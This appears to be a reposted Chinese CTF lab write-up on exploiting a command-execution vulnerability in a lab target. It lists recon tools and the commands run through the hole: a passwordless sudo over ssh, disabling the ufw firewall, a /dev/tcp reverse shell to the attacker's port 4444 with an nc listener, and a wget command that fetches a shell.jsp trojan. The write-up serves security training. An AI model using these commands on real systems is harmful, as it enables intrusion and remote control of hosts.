CTF—攻防練習之HTTP—命令執行漏洞


 

滲透環境:

主機:192.168.32.152

靶機:192.168.32.1

 

命令執行漏洞

命令執行漏洞概念:當應用需要調用一些外部程序去處理內容的情況下,就會用到一些執行系統命令的函數。如PHP中的system,exec,shell_exec等,當用戶可以控制命令執行函數中的參數時,將可注入惡意系統命令到正常命令中,造成命令執行攻擊。

 

漏洞成因:腳本語言優點是簡潔,方便,但也伴隨着一些問題,如速度慢,無法解除系統底層,如果我們開發的應用需要一些除去web的特殊功能時,就需要調用一些外部程序。

 

開始滲透:

nmap,nikto,dirb掃描,探測

發現開放的端口是8080,發現一個敏感文件

打開


發現輸入會有回顯,存在命令執行漏洞

我們就利用這個漏洞:

查看臨時緩沖目錄:ls -alh /tmp
查看home目錄,挖掘用戶信息 ls -alh /home/
查看具體用戶的目錄: ls -alh /home/用戶名/
查看系統消息:uname -a

利用漏洞發現用戶bill有可利用的價值

查看版本信息,發現ubuntu此版本可能存在一個防火牆

此時我們可以利用ssh執行root權限命令
使用ssh 用戶名@localhost 通過ssh登錄服務器不需要驗證身份

 

查看bill用戶 sudo命令的權限: ssh bill@localhost sudo -l


關閉防火牆: ssh bill@localhost sudo ufw disable

隨后我們就可以上傳反彈shell腳本

方法1.
利用命令執行靶機反彈shell:ssh bill@localhost sudo bash -i>& /dev/tcp/主機ip/4444 0>&1
啟動監聽:nc -nlvp 4444

方法2.
利用命令執行下載木馬文件:
ssh bill@loaclhost sudo wget "http://ip:port/shell.jsp -O +根目錄
開啟python http服務器:python3 -m http.server 

拿下靶場

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM